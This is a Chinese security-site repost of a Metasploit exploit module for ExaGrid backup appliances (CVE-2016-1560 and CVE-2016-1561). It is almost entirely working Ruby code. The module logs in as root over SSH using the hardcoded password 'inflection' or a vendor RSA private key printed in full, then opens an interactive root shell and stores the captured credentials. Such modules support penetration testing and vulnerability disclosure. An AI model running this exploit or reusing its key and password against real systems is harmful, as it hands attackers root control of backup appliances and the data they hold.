首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ExaGrid Known SSH Key / Default Password
来源:metasploit.com 作者:egypt 发布时间:2016-04-12  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'net/ssh'


class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info, {
      'Name'        => 'ExaGrid Known SSH Key and Default Password',
      'Description' => %q{
        ExaGrid ships a public/private key pair on their backup appliances to
        allow passwordless authentication to other ExaGrid appliances.  Since
        the private key is easily retrievable, an attacker can use it to gain
        unauthorized remote access as root. Additionally, this module will
        attempt to use the default password for root, 'inflection'.
      },
      'Platform'    => 'unix',
      'Arch'        => ARCH_CMD,
      'Privileged'  => true,
      'Targets'     => [ [ "Universal", {} ] ],
      'Payload'     =>
        {
          'Compat'  => {
            'PayloadType'    => 'cmd_interact',
            'ConnectionType' => 'find',
          },
        },
      'Author'      => ['egypt'],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2016-1560' ], # password
          [ 'CVE', '2016-1561' ], # private key
          [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ]
        ],
      'DisclosureDate' => "Apr 07 2016",
      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
      'DefaultTarget' => 0
    }))

    register_options(
      [
        # Since we don't include Tcp, we have to register this manually
        Opt::RHOST(),
        Opt::RPORT(22)
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )

  end

  # helper methods that normally come from Tcp
  def rhost
    datastore['RHOST']
  end
  def rport
    datastore['RPORT']
  end

  def do_login(user)
    ssh_options = {
      auth_methods: ['publickey', 'password'],
      config: false,
      disable_agent: true,
      key_data: [ key_data ],
      msfmodule: self,
      msframework: framework,
      password: 'inflection',
      port: rport,
      proxies: datastore['Proxies'],
      record_auth_info: true,
    }
    ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']

    begin
      ssh_socket = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh_socket = Net::SSH.start(rhost, user, ssh_options)
      end
    rescue Rex::ConnectionError
      return
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return
    end

    if ssh_socket

      # Create a new session from the socket, then dump it.
      conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash -i', true)
      ssh_socket = nil

      return conn
    else
      return false
    end
  end

  # Ghetto hack to prevent the shell detection logic from hitting false
  # negatives due to weirdness with ssh sockets. We already know it's a shell
  # because auth succeeded by this point, so no need to do the check anyway.
  module TrustMeItsAShell
    def _check_shell(*args)
      true
    end
  end

  def exploit
    payload_instance.extend(TrustMeItsAShell)

    conn = do_login("root")
    if conn
      print_good "Successful login"
      service_data = {
        address: rhost,
        port: rport,
        protocol: 'tcp',
        service_name: 'ssh',
        workspace_id: myworkspace_id,
      }
      credential_data = {
        username: 'root',
        private_type: (conn.ssh.auth_info[:method] == "publickey" ? :ssh_key : :password),
        private_data: (conn.ssh.auth_info[:method] == "publickey" ? key_data : 'inflection'),
        origin_type: :service,
        module_fullname: fullname,
      }.merge(service_data)

      core = create_credential(credential_data)
      login_data = {
        core: core,
        last_attempted: Time.now,
      }.merge(service_data)

      create_credential_login(login_data)

      handler(conn.lsock)
    end
  end

  def key_data
    <<EOF
-----BEGIN RSA PRIVATE KEY-----
MIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10
hIruzXQAik7TEBYZyvw9SvYU6MQFsMeqVHGhcXQ5yaz3G/eqX0RhRDn5T4zoHKZa
E1MU86zqAUdSXwHDe3pz5JEoGl9EUHTLMGP13T3eBJ19MAWjP7Iuji9HAgElAoGA
GSZrnBieX2pdjsQ55/AJA/HF3oJWTRysYWi0nmJUmm41eDV8oRxXl2qFAIqCgeBQ
BWA4SzGA77/ll3cBfKzkG1Q3OiVG/YJPOYLp7127zh337hhHZyzTiSjMPFVcanrg
AciYw3X0z2GP9ymWGOnIbOsucdhnbHPuSORASPOUOn0CQQC07Acq53rf3iQIkJ9Y
iYZd6xnZeZugaX51gQzKgN1QJ1y2sfTfLV6AwsPnieo7+vw2yk+Hl1i5uG9+XkTs
Ry45AkEAkk0MPL5YxqLKwH6wh2FHytr1jmENOkQu97k2TsuX0CzzDQApIY/eFkCj
QAgkI282MRsaTosxkYeG7ErsA5BJfwJAMOXYbHXp26PSYy4BjYzz4ggwf/dafmGz
ebQs+HXa8xGOreroPFFzfL8Eg8Ro0fDOi1lF7Ut/w330nrGxw1GCHQJAYtodBnLG
XLMvDHFG2AN1spPyBkGTUOH2OK2TZawoTmOPd3ymK28LriuskwxrceNb96qHZYCk
86DC8q8p2OTzYwJANXzRM0SGTqSDMnnid7PGlivaQqfpPOx8MiFR/cGr2dT1HD7y
x6f/85mMeTqamSxjTJqALHeKPYWyzeSnUrp+Eg==
-----END RSA PRIVATE KEY-----
EOF
  end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PostgreSQL CREATE LANGUAGE Exe
·Express Zip 2.40 - Path Traver
·Apple Intel HD 3000 Graphics D
·CAM UnZip 5.1 - Archive Path T
·MESS 0.154-3.1 Buffer Overflow
·Oracle Application Testing Sui
·Linux x86 - Disable ASLR by Se
·Texas Instrument Emulator 3.03
·Internet Explorer - MSHTML!CSV
·Dell KACE K1000 File Upload
·Easy File Sharing HTTP SerEasy
·Internet Explorer 9, 10, 11 -
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved